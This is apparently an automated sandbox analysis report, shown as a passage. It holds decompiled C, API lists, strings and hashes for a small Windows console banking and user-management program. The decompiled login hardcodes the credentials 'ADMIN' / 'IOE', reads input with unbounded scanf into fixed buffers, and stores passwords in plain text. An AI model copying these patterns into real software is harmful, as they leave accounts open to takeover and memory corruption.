strcat.MSVCRT(?,?), ref: 0023507A
strcat.MSVCRT(?,0023A5E4), ref: 0023508E
strlen.MSVCRT ref: 0023509F
puts.MSVCRT ref: 002350BD
printf.MSVCRT ref: 002350D4
fopen.MSVCRT ref: 002350FD
fopen.MSVCRT ref: 00235115
fscanf.MSVCRT ref: 0023516B
strcmp.MSVCRT ref: 00235188
fprintf.MSVCRT ref: 00235217
fclose.MSVCRT ref: 0023522B
fclose.MSVCRT ref: 0023523B
fopen.MSVCRT ref: 0023524E
_strtime.MSVCRT ref: 00235261
fprintf.MSVCRT ref: 0023529A
fclose.MSVCRT ref: 002352AA

Part of subcall function 002323F0: printf.MSVCRT ref: 00232464

printf.MSVCRT ref: 002352C6

Strings

p5u:u@su, xrefs: 00235217, 0023529A
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00234EEC
TRANSACTION.DAT, xrefs: 00235249
%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 0023520B
[In words : , xrefs: 00235058
ACCOUNT.DAT, xrefs: 002350F8
Confirm Transaction, xrefs: 00234FF5
Transaction completed successfully!, xrefs: 002352C1
ACCOUNT.DAT, xrefs: 00234E9D
[ %s ], xrefs: 00234FB0
Amount to be Deposited (in NRs.) : , xrefs: 00234FC7
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 0023515F
Deposit to A/C number : , xrefs: 00234E5E
Given A/C number does not exits!, xrefs: 00234F8D
Are you sure you want to perform this tranasction? <Y/N>, xrefs: 002350CF
%s %s %s %s %.2f %s, xrefs: 0023528F
%s to be deposited in A/C number : %s [ %s ], xrefs: 00235031
Cash+Deposited, xrefs: 00235286
TEMP.DAT, xrefs: 00235110

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$fclosefopenstrcat$strcmpstrcpy$_strdatefprintffscanfscanf$ConsoleCursorHandlePosition_strtime_struprputsstrlen
String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be deposited in A/C number : %s [ %s ]$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Deposited (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Deposited$Confirm Transaction$Deposit to A/C number : $Given A/C number does not exits!$TEMP.DAT$TRANSACTION.DAT$Transaction completed successfully!$[ %s ]$[In words : $p5u:u@su
API String ID: 479242606-2952226669
Opcode ID: 2bf3bf342d415fdc3bc1f27b516dfa0e31bfecb5a73d2078b8805ad073db69c8
Instruction ID: b7b12d0605f8f28d004f505d8d57f14cb8d2d9aa79cbd388176882ba1e5fc472
Opcode Fuzzy Hash: 2bf3bf342d415fdc3bc1f27b516dfa0e31bfecb5a73d2078b8805ad073db69c8
Instruction Fuzzy Hash: 2FC1B9F2D20308ABCB15DBA4EC4AFDE7738AF55701F044655F60AA5051EB7066ACCFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00233000, Relevance: 94.8, APIs: 39, Strings: 15, Instructions: 298
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00233000(void* __fp0) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v19;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v48;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v75;
				char _v79;
				char _v80;
				char _v83;
				char _v87;
				char _v91;
				char _v95;
				char _v99;
				char _v103;
				char _v107;
				char _v111;
				char _v112;
				char _v144;
				char _v176;
				char _v208;
				struct _IO_FILE* _t76;
				int _t78;
				struct _IO_FILE* _t79;
				int _t83;
				int _t96;
				struct _IO_FILE* _t98;
				int _t100;
				struct _IO_FILE* _t101;
				int _t113;
				int _t116;
				int _t134;
				int _t135;
				struct _IO_FILE* _t138;
				struct _IO_FILE* _t142;
				struct _IO_FILE* _t152;
				struct _IO_FILE* _t154;
				struct _IO_FILE* _t156;
				void* _t164;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t172;
				void* _t178;
				void* _t179;
				void* _t187;

				_t202 = __fp0;
				_v48 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v19 = 0;
				_v80 = 0;
				_v79 = 0;
				_v75 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v112 = 0;
				_v111 = 0;
				_v107 = 0;
				_v103 = 0;
				_v99 = 0;
				_v95 = 0;
				_v91 = 0;
				_v87 = 0;
				_v83 = 0;
				_v16 = 0;
				_v12 = 0;
				E002323F0(0, __fp0);
				E00231000(0x19, 8);
				printf("User Name  : ");
				_push(0x23b244);
				scanf("%s");
				E00231000(0x19, 0xa);
				printf("Password  : ");
				E00231040( &_v80);
				strcpy(0x23b262,  &_v80);
				_t76 = fopen("USER.DAT", "r");
				_t169 = _t164 + 0x20;
				 *0x23b288 = _t76;
				while(1) {
					_t138 =  *0x23b288; // 0x0
					_t78 = fscanf(_t138, "%s %s %s\n", 0x23b240,  &_v176,  &_v144);
					_t170 = _t169 + 0x14;
					if(_t78 == 0xffffffff) {
						break;
					}
					strcpy( &_v176, _strupr( &_v176));
					strcpy( &_v144, _strupr( &_v144));
					strcpy(0x23b244, _strupr(0x23b244));
					strcpy(0x23b262, _strupr(0x23b262));
					_t134 = strcmp(0x23b244,  &_v176);
					_t169 = _t170 + 0x38;
					if(_t134 == 0) {
						_t135 = strcmp(0x23b262,  &_v144);
						_t169 = _t169 + 8;
						if(_t135 == 0) {
							_v16 = _v16 + 1;
						}
					}
				}
				_t79 =  *0x23b288; // 0x0
				fclose(_t79);
				_t171 = _t170 + 4;
				E002323F0(_t138, _t202);
				if(_v16 != 0) {
					E00231000(8, 0xa);
					_t83 = printf("Are you sure you want to CHANGE user name and/or password? <Y/N> : ");
					_t172 = _t171 + 4;
					_t139 = _v5;
					if(_v5 == 0x59 || _v5 == 0x79) {
						do {
							E002323F0(_t139, _t202);
							_v12 = 0;
							E00231000(0x19, 8);
							printf("NEW User Name        : ");
							_push( &_v208);
							scanf("%s");
							E00231000(0x19, 0xa);
							printf("NEW Password         : ");
							E00231040( &_v48);
							E00231000(0x19, 0xc);
							printf("Confirm NEW Password : ");
							E00231040( &_v112);
							_t139 =  &_v48;
							_t96 = strcmp( &_v48,  &_v112);
							_t172 = _t172 + 0x1c;
							if(_t96 != 0) {
								E002323F0( &_v48, _t202);
								E00231000(0xa, 0xa);
								printf(0x239874);
								_t172 = _t172 + 4;
								_v12 = _v12 + 1;
							}
						} while (_v12 != 0);
						 *0x23b288 = fopen("USER.DAT", 0x2398a4);
						_t98 = fopen("temp.dat", "a");
						_t178 = _t172 + 0x10;
						 *0x23b280 = _t98;
						while(1) {
							_t152 =  *0x23b288; // 0x0
							_t100 = fscanf(_t152, "%s %s %s\n", 0x23b240,  &_v176,  &_v144);
							_t179 = _t178 + 0x14;
							if(_t100 == 0xffffffff) {
								break;
							}
							strcpy( &_v176, _strupr( &_v176));
							strcpy( &_v144, _strupr( &_v144));
							_t113 = strcmp(0x23b244,  &_v176);
							_t187 = _t179 + 0x20;
							if(_t113 != 0) {
								L17:
								_push( &_v144);
								_push( &_v176);
								_push(0x23b240);
								_t154 =  *0x23b280; // 0x0
								fprintf(_t154, "%s %s %s\n");
								_t178 = _t187 + 0x14;
								L19:
								continue;
							}
							_t116 = strcmp(0x23b262,  &_v144);
							_t187 = _t187 + 8;
							if(_t116 == 0) {
								_push( &_v48);
								_push( &_v208);
								_push(0x23b240);
								_t156 =  *0x23b280; // 0x0
								fprintf(_t156, "%s %s %s\n");
								_t178 = _t187 + 0x14;
								goto L19;
							}
							goto L17;
						}
						_t101 =  *0x23b288; // 0x0
						fclose(_t101);
						_t142 =  *0x23b280; // 0x0
						fclose(_t142);
						E002323F0(_t142, _t202);
						E00231000(0x19, 0xa);
						return printf("Record has been EDITED successfully!");
					} else {
						return _t83;
					}
				}
				E00231000(0xa, 0xa);
				return printf(0x2397a4);
			}

0x00233000
0x00233009
0x0023300f
0x00233012
0x00233015
0x00233018
0x0023301b
0x0023301e
0x00233021
0x00233024
0x00233027
0x0023302d
0x00233030
0x00233033
0x00233036
0x00233039
0x0023303c
0x0023303f
0x00233042
0x00233045
0x0023304b
0x0023304e
0x00233051
0x00233054
0x00233057
0x0023305a
0x0023305d
0x00233060
0x00233063
0x0023306a
0x00233071
0x0023307a
0x00233084
0x0023308d
0x00233097
0x002330a4
0x002330ae
0x002330bb
0x002330c9
0x002330db
0x002330e1
0x002330e4
0x002330e9
0x00233101
0x00233108
0x0023310e
0x00233114
0x00000000
0x00000000
0x00233132
0x00233152
0x0023316e
0x0023318a
0x0023319e
0x002331a3
0x002331a8
0x002331b6
0x002331bb
0x002331c0
0x002331c8
0x002331c8
0x002331c0
0x002331cb
0x002331d0
0x002331d6
0x002331dc
0x002331df
0x002331e8
0x0023320a
0x00233214
0x0023321a
0x0023321d
0x00233224
0x00233233
0x00233233
0x00233238
0x00233243
0x0023324d
0x0023325c
0x00233262
0x0023326f
0x00233279
0x00233286
0x0023328f
0x00233299
0x002332a6
0x002332af
0x002332b3
0x002332b8
0x002332bd
0x002332bf
0x002332c8
0x002332d2
0x002332d8
0x002332e1
0x002332e1
0x002332e4
0x00233301
0x00233310
0x00233316
0x00233319
0x0023331e
0x00233336
0x0023333d
0x00233343
0x00233349
0x00000000
0x00000000
0x00233367
0x00233387
0x0023339b
0x002333a0
0x002333a5
0x002333bf
0x002333c5
0x002333cc
0x002333cd
0x002333d7
0x002333de
0x002333e4
0x0023340e
0x00000000
0x0023340e
0x002333b3
0x002333b8
0x002333bd
0x002333ec
0x002333f3
0x002333f4
0x002333fe
0x00233405
0x0023340b
0x00000000
0x0023340b
0x00000000
0x002333bd
0x00233413
0x00233419
0x00233422
0x00233429
0x00233432
0x0023343b
0x00000000
0x00233451
0x00233451
0x00233451
0x00233224
0x002331ee
0x00000000

APIs

Part of subcall function 002323F0: printf.MSVCRT ref: 0023240F
Part of subcall function 002323F0: strcmp.MSVCRT ref: 0023242B
Part of subcall function 002323F0: printf.MSVCRT ref: 0023244F
Part of subcall function 002323F0: printf.MSVCRT ref: 00232472
Part of subcall function 002323F0: _strdate.MSVCRT ref: 00232480
Part of subcall function 002323F0: printf.MSVCRT ref: 0023249D
Part of subcall function 002323F0: _strdate.MSVCRT ref: 002324AB
Part of subcall function 002323F0: printf.MSVCRT ref: 002324DF

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 00233084
scanf.MSVCRT ref: 00233097
printf.MSVCRT ref: 002330AE

Part of subcall function 00231040: isprint.MSVCRT ref: 00231052
Part of subcall function 00231040: printf.MSVCRT ref: 0023107A

strcpy.MSVCRT(0023B262,00000000,00000000), ref: 002330C9
fopen.MSVCRT ref: 002330DB
fscanf.MSVCRT ref: 00233108
_strupr.MSVCRT ref: 00233121
strcpy.MSVCRT(?,00000000), ref: 00233132
_strupr.MSVCRT ref: 00233141
strcpy.MSVCRT(?,00000000), ref: 00233152
_strupr.MSVCRT ref: 0023315F
strcpy.MSVCRT(0023B244,00000000), ref: 0023316E
_strupr.MSVCRT ref: 0023317B
strcpy.MSVCRT(0023B262,00000000), ref: 0023318A
strcmp.MSVCRT ref: 0023319E
strcmp.MSVCRT ref: 002331B6
fclose.MSVCRT ref: 002331D6
printf.MSVCRT ref: 002331F8
printf.MSVCRT ref: 00233214
printf.MSVCRT ref: 0023324D
scanf.MSVCRT ref: 00233262
printf.MSVCRT ref: 00233279
printf.MSVCRT ref: 00233299
strcmp.MSVCRT ref: 002332B3
printf.MSVCRT ref: 002332D2
fopen.MSVCRT ref: 002332F8
fopen.MSVCRT ref: 00233310
fscanf.MSVCRT ref: 0023333D
_strupr.MSVCRT ref: 00233356
strcpy.MSVCRT(?,00000000), ref: 00233367
_strupr.MSVCRT ref: 00233376
strcpy.MSVCRT(?,00000000), ref: 00233387
strcmp.MSVCRT ref: 0023339B
strcmp.MSVCRT ref: 002333B3
fprintf.MSVCRT ref: 002333DE
fprintf.MSVCRT ref: 00233405
fclose.MSVCRT ref: 00233419
fclose.MSVCRT ref: 00233429
printf.MSVCRT ref: 00233445

Strings

p5u:u@su, xrefs: 002333DE, 00233405
%s %s %s, xrefs: 002333D2
NEW User Name : , xrefs: 00233248
Confirm NEW Password : , xrefs: 00233294
NEW Password : , xrefs: 00233274
Record has been EDITED successfully!, xrefs: 00233440
%s %s %s, xrefs: 00233331
Password : , xrefs: 002330A9
USER.DAT, xrefs: 002330D6
%s %s %s, xrefs: 002330FC
User Name : , xrefs: 0023307F
temp.dat, xrefs: 0023330B
%s %s %s, xrefs: 002333F9
USER.DAT, xrefs: 002332F3
Are you sure you want to CHANGE user name and/or password? <Y/N> : , xrefs: 0023320F

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$strcpy$_struprstrcmp$fclosefopen$_strdatefprintffscanfscanf$ConsoleCursorHandlePositionisprint
String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s$Are you sure you want to CHANGE user name and/or password? <Y/N> : $Confirm NEW Password : $NEW Password : $NEW User Name : $Password : $Record has been EDITED successfully!$USER.DAT$USER.DAT$User Name : $p5u:u@su$temp.dat
API String ID: 690576788-1485964264
Opcode ID: 24e82957ae7543871e0ee80c10266779971df5e7c739324ae156d41635bd0234
Instruction ID: e5a861bc55a87b3ca4f28b86631a14eabc00caa7068fe77a953a8c91f75b9a1e
Opcode Fuzzy Hash: 24e82957ae7543871e0ee80c10266779971df5e7c739324ae156d41635bd0234
Instruction Fuzzy Hash: 49B1C4F0E60304EFDB14DFA4EC4AF9E7674AF12701F048165FA09E6191EAB056788F66

Uniqueness

Uniqueness Score: -1.00%

Function 00232600, Relevance: 73.7, APIs: 25, Strings: 17, Instructions: 216
stringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00232600(void* __fp0) {
				char _v5;
				char _v6;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				signed int _v28;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v60;
				char _v92;
				int _t58;
				int _t81;
				int _t84;
				void* _t104;
				void* _t112;
				void* _t113;
				void* _t118;
				void* _t128;

				_t128 = __fp0;
				_v60 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v20 = 0;
				_v16 = 0;
				do {
					_v20 = 0;
					E00231000(7, 5);
					printf("Only THREE attempts shall be allowed to enter username and password.");
					E002310D0(0xa, 8, 0x46, 0xf);
					E00231000(0x17, 0xa);
					printf("Enter User name : ");
					_push( &_v92);
					scanf("%s");
					E00231000(0x17, 0xc);
					printf("Password        : ");
					E00231040( &_v60);
					strcpy( &_v92, _strupr( &_v92));
					strcpy( &_v60, _strupr( &_v60));
					_t112 = _t104 + 0x2c;
					_t93 = _v16 + 1;
					_v16 = _v16 + 1;
					if(_v16 == 3) {
						E002323F0(_t93, _t128);
						E00231000(0x19, 8);
						printf(0x239378);
						E00231000(0x16, 0xb);
						printf("Press any key to exit the program...");
						_t112 = _t112 + 8;
						exit(0);
					}
					_t58 = strcmp( &_v92, "ADMIN");
					_t113 = _t112 + 8;
					if(_t58 != 0) {
						L6:
						E002323F0(_t93, _t128);
						E00231000(0x19, 0xa);
						printf(0x2393cc);
						_t104 = _t113 + 4;
					} else {
						_t84 = strcmp( &_v60, "IOE");
						_t113 = _t113 + 8;
						if(_t84 != 0) {
							goto L6;
						} else {
							_v20 = 1;
						}
					}
				} while (_v20 != 1);
				do {
					E002323F0(_t93, _t128);
					E00231000(0x1e, 8);
					printf("1. Add User");
					E00231000(0x1e, 0xa);
					printf("2. Delete User");
					E00231000(0x1e, 0xc);
					printf("3. Edit User name / Password");
					E00231000(0x1e, 0xe);
					printf("4. View User Log");
					E00231000(0x1e, 0x10);
					printf("5. Exit");
					_t118 = _t104 + 0x14;
					E00231000(1, 0x11);
					_v24 = 0;
					while(_v24 < 0x4e) {
						printf("_");
						_t118 = _t118 + 4;
						_v24 = _v24 + 1;
					}
					E00231000(0x17, 0x13);
					printf(" Press a number between the range [1 -5]  ");
					_t104 = _t118 + 4;
					_v28 = _v6 - 0x30;
					_v12 = _v28;
					_t93 = _v12 - 1;
					_v12 = _v12 - 1;
					__eflags = _v12 - 4;
					if(__eflags > 0) {
						E002323F0(_t93, _t128);
						E00231000(0xa, 0xa);
						printf("Your input is out of range! Enter a choice between 1 to 5!");
						E00231000(0xf, 0xc);
						_t81 = printf("Press ENTER to return to main menu...");
						_t104 = _t104 + 8;
					} else {
						switch( *((intOrPtr*)(_v12 * 4 +  &M00232904))) {
							case 0:
								_t81 = E00232920(_t128);
								goto L23;
							case 1:
								E00232C00(__ecx, __fp0);
								goto L23;
							case 2:
								E00233000(__fp0);
								goto L23;
							case 3:
								E00233460(__edx, __eflags, __fp0);
								goto L23;
							case 4:
								E002323F0(__ecx, __fp0);
								E00231000(0xf, 0xa);
								printf("Are you sure you want to exit? <Y/N> : ");
								__eflags = _v5 - 0x59;
								if(_v5 == 0x59) {
									L20:
									exit(0);
								} else {
									__ecx = _v5;
									__eflags = __ecx - 0x79;
									if(__ecx == 0x79) {
										goto L20;
									}
								}
								goto L23;
						}
					}
					L23:
					__eflags = 1;
				} while (1 != 0);
				return _t81;
			}

0x00232600
0x00232606
0x0023260c
0x0023260f
0x00232612
0x00232615
0x00232618
0x0023261b
0x0023261e
0x00232621
0x00232624
0x0023262b
0x00232632
0x00232632
0x0023263d
0x00232647
0x00232658
0x00232661
0x0023266b
0x00232677
0x0023267d
0x0023268a
0x00232694
0x002326a1
0x002326b8
0x002326d2
0x002326d7
0x002326dd
0x002326e0
0x002326e7
0x002326e9
0x002326f2
0x002326fc
0x00232709
0x00232713
0x00232719
0x0023271e
0x0023271e
0x0023272d
0x00232732
0x00232737
0x00232757
0x00232757
0x00232760
0x0023276a
0x00232770
0x00232739
0x00232742
0x00232747
0x0023274c
0x00000000
0x0023274e
0x0023274e
0x0023274e
0x0023274c
0x00232773
0x0023277d
0x0023277d
0x00232786
0x00232790
0x0023279d
0x002327a7
0x002327b4
0x002327be
0x002327cb
0x002327d5
0x002327e2
0x002327ec
0x002327f2
0x002327f9
0x002327fe
0x00232810
0x0023281b
0x00232821
0x0023280d
0x0023280d
0x0023282a
0x00232834
0x0023283a
0x00232844
0x0023284a
0x00232850
0x00232853
0x00232856
0x0023285a
0x002328bd
0x002328c6
0x002328d0
0x002328dd
0x002328e7
0x002328ed
0x0023285c
0x0023285f
0x00000000
0x00232866
0x00000000
0x00000000
0x00232870
0x00000000
0x00000000
0x00232877
0x00000000
0x00000000
0x0023287e
0x00000000
0x00000000
0x00232885
0x0023288e
0x00232898
0x002328a5
0x002328a8
0x002328b3
0x002328b5
0x002328aa
0x002328aa
0x002328ae
0x002328b1
0x00000000
0x00000000
0x002328b1
0x00000000
0x00000000
0x0023285f
0x002328f0
0x002328f5
0x002328f5
0x00232900

APIs

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 00232647

Part of subcall function 002310D0: printf.MSVCRT ref: 002310ED
Part of subcall function 002310D0: printf.MSVCRT ref: 0023112C
Part of subcall function 002310D0: printf.MSVCRT ref: 0023114E
Part of subcall function 002310D0: printf.MSVCRT ref: 002311C3
Part of subcall function 002310D0: printf.MSVCRT ref: 002311E7

printf.MSVCRT ref: 0023266B
scanf.MSVCRT ref: 0023267D
printf.MSVCRT ref: 00232694

Part of subcall function 00231040: isprint.MSVCRT ref: 00231052
Part of subcall function 00231040: printf.MSVCRT ref: 0023107A

_strupr.MSVCRT ref: 002326AA
strcpy.MSVCRT(?,00000000), ref: 002326B8
_strupr.MSVCRT ref: 002326C4
strcpy.MSVCRT(00000000,00000000), ref: 002326D2
printf.MSVCRT ref: 002326FC
printf.MSVCRT ref: 00232713
exit.MSVCRT ref: 0023271E

Part of subcall function 002323F0: printf.MSVCRT ref: 00232464

strcmp.MSVCRT ref: 0023272D
strcmp.MSVCRT ref: 00232742
printf.MSVCRT ref: 0023276A

Part of subcall function 00232920: printf.MSVCRT ref: 0023298D
Part of subcall function 00232920: scanf.MSVCRT ref: 002329A0
Part of subcall function 00232920: fopen.MSVCRT ref: 002329B3
Part of subcall function 00232920: fscanf.MSVCRT ref: 002329E4
Part of subcall function 00232920: _strupr.MSVCRT ref: 002329F6
Part of subcall function 00232920: strcpy.MSVCRT(?,00000000), ref: 00232A04
Part of subcall function 00232920: _strupr.MSVCRT ref: 00232A11
Part of subcall function 00232920: strcpy.MSVCRT(0023B244,00000000), ref: 00232A20
Part of subcall function 00232920: strcmp.MSVCRT ref: 00232A31
Part of subcall function 00232920: fclose.MSVCRT ref: 00232A4E
Part of subcall function 00232920: printf.MSVCRT ref: 00232A6B

printf.MSVCRT ref: 00232790
printf.MSVCRT ref: 002327A7
printf.MSVCRT ref: 002327BE
printf.MSVCRT ref: 002327D5
printf.MSVCRT ref: 002327EC
printf.MSVCRT ref: 0023281B
printf.MSVCRT ref: 00232834

Part of subcall function 002323F0: printf.MSVCRT ref: 0023240F
Part of subcall function 002323F0: strcmp.MSVCRT ref: 0023242B
Part of subcall function 002323F0: printf.MSVCRT ref: 0023244F
Part of subcall function 002323F0: printf.MSVCRT ref: 00232472
Part of subcall function 002323F0: _strdate.MSVCRT ref: 00232480
Part of subcall function 002323F0: printf.MSVCRT ref: 0023249D
Part of subcall function 002323F0: _strdate.MSVCRT ref: 002324AB
Part of subcall function 002323F0: printf.MSVCRT ref: 002324DF

Strings

1. Add User, xrefs: 0023278B
Your input is out of range! Enter a choice between 1 to 5!, xrefs: 002328CB
Are you sure you want to exit? <Y/N> : , xrefs: 00232893
4. View User Log, xrefs: 002327D0
Press a number between the range [1 -5] , xrefs: 0023282F
Press any key to exit the program..., xrefs: 0023270E
Only THREE attempts shall be allowed to enter username and password., xrefs: 00232642
ADMIN, xrefs: 00232724
Password : , xrefs: 0023268F
5. Exit, xrefs: 002327E7
Press ENTER to return to main menu..., xrefs: 002328E2
@su, xrefs: 002326AA, 002326C4
3. Edit User name / Password, xrefs: 002327B9
Enter User name : , xrefs: 00232666
IOE, xrefs: 00232739
N, xrefs: 00232810
2. Delete User, xrefs: 002327A2

Memory Dump Source

Source File: 00000000.00000002.244120518.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.244113353.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244137823.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.244153970.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.244162037.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$_struprstrcmpstrcpy$_strdatescanf$ConsoleCursorHandlePositionexitfclosefopenfscanfisprint
String ID: Press a number between the range [1 -5] $1. Add User$2. Delete User$3. Edit User name / Password$4. View User Log$5. Exit$@su$ADMIN$Are you sure you want to exit? <Y/N> : $Enter User name : $IOE$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to return to main menu...$Press any key to exit the program...$Your input is out of range! Enter a choice between 1 to 5!
API String ID: 1012356128-1918513543
Opcode ID: 6b9369546028292ee44304aefdd7867ec29a9f5ea0188d28a97c0b403f64ac0c
Instruction ID: 8925a46c8bb040fb9feba33ee9f4a763a80e918939b62210a9b2f50fd44da918
Opcode Fuzzy Hash: 6b9369546028292ee44304aefdd7867ec29a9f5ea0188d28a97c0b403f64ac0c
Instruction Fuzzy Hash: 0E7151F0A60344EBEB14ABF4AD4BB9D7670AF11B05F100024F606B91D5DAF161B89B67

Uniqueness

Uniqueness Score: -1.00%

Function 00232920, Relevance: 63.2, APIs: 24, Strings: 12, Instructions: 198
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00232920(void* __fp0) {
				char _v8;
				char _v12;
				char _v15;
				char _v19;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v75;
				char _v76;
				char _v108;
				char _v140;
				struct _IO_FILE* _t47;
				int _t49;
				struct _IO_FILE* _t50;
				int _t60;
				struct _IO_FILE* _t61;
				struct _IO_FILE* _t62;
				int _t63;
				struct _IO_FILE* _t68;
				int _t86;
				struct _IO_FILE* _t88;
				struct _IO_FILE* _t90;
				struct _IO_FILE* _t97;
				void* _t101;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t110;
				void* _t124;

				_t124 = __fp0;
				_v8 = 0;
				_v12 = 0;
				_v44 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v19 = 0;
				_v15 = 0;
				_v76 = 0;
				_t87 = 0;
				_v75 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				do {
					E002323F0(_t87, _t124);
					_v8 = 0;
					E00231000(0x19, 8);
					printf("User Name        : ");
					_push(0x23b244);
					scanf("%s");
					_t47 = fopen("USER.DAT", "r");
					_t104 = _t101 + 0x14;
					 *0x23b288 = _t47;
					_v12 = 0;
					while(1) {
						_t88 =  *0x23b288; // 0x0
						_t49 = fscanf(_t88, "%s %s %s\n", 0x23b240,  &_v108,  &_v140);
						_t105 = _t104 + 0x14;
						if(_t49 == 0xffffffff) {
							goto L6;
						}
						strcpy( &_v108, _strupr( &_v108));
						strcpy(0x23b244, _strupr(0x23b244));
						_t86 = strcmp( &_v108, 0x23b244);
						_t104 = _t105 + 0x20;
						if(_t86 == 0) {
							_v12 = _v12 + 1;
						}
					}
					L6:
					_t50 =  *0x23b288; // 0x0
					fclose(_t50);
					_t106 = _t105 + 4;
					if(_v12 == 0) {
						E00231000(0x19, 0xa);
						printf("Password         : ");
						E00231040( &_v44);
						strcpy(0x23b262,  &_v44);
						E00231000(0x19, 0xc);
						printf("Confirm Password : ");
						_t87 =  &_v76;
						E00231040( &_v76);
						_t60 = strcmp(0x23b262,  &_v76);
						_t101 = _t106 + 0x18;
						if(_t60 != 0) {
							E002323F0( &_v76, _t124);
							E00231000(0xa, 0xa);
							printf(0x239598);
							_t101 = _t101 + 4;
							_v8 = _v8 + 1;
						}
					} else {
						E00231000(0xa, 0xa);
						printf(0x239534);
						_t101 = _t106 + 4;
						_t87 = _v8 + 1;
						_v8 = _v8 + 1;
					}
				} while (_v8 != 0);
				_t61 = fopen("USER.DAT", 0x2395c8);
				_t110 = _t101 + 8;
				 *0x23b288 = _t61;
				if( *0x23b288 != 0) {
					while(1) {
						_t62 =  *0x23b288; // 0x0
						_t63 = fscanf(_t62, "%s %s %s\n", 0x23b240,  &_v108,  &_v140);
						_t110 = _t110 + 0x14;
						if(_t63 == 0xffffffff) {
							break;
						}
					}
					E002312C0( &_v140, 0x23b240);
					L16:
					_t90 =  *0x23b288; // 0x0
					fclose(_t90);
					 *0x23b288 = fopen("USER.DAT", "a");
					_push(0x23b262);
					_push(0x23b244);
					_push(0x23b240);
					_t97 =  *0x23b288; // 0x0
					fprintf(_t97, "%s %s %s\n");
					_t68 =  *0x23b288; // 0x0
					fclose(_t68);
					E002323F0(_t90, _t124);
					E00231000(0x19, 0xa);
					return printf("Record ADDED successfully!");
				}
				strcpy(0x23b240, "U01");
				_t110 = _t110 + 8;
				goto L16;
			}

0x00232920
0x00232929
0x00232930
0x00232937
0x0023293d
0x00232940
0x00232943
0x00232946
0x00232949
0x0023294c
0x0023294f
0x00232952
0x00232955
0x00232959
0x0023295b
0x0023295e
0x00232961
0x00232964
0x00232967
0x0023296a
0x0023296d
0x00232970
0x00232973
0x00232973
0x00232978
0x00232983
0x0023298d
0x00232996
0x002329a0
0x002329b3
0x002329b9
0x002329bc
0x002329c1
0x002329c8
0x002329dd
0x002329e4
0x002329ea
0x002329f0
0x00000000
0x00000000
0x00232a04
0x00232a20
0x00232a31
0x00232a36
0x00232a3b
0x00232a43
0x00232a43
0x00232a46
0x00232a48
0x00232a48
0x00232a4e
0x00232a54
0x00232a5b
0x00232a86
0x00232a90
0x00232a9d
0x00232aab
0x00232ab7
0x00232ac1
0x00232aca
0x00232ace
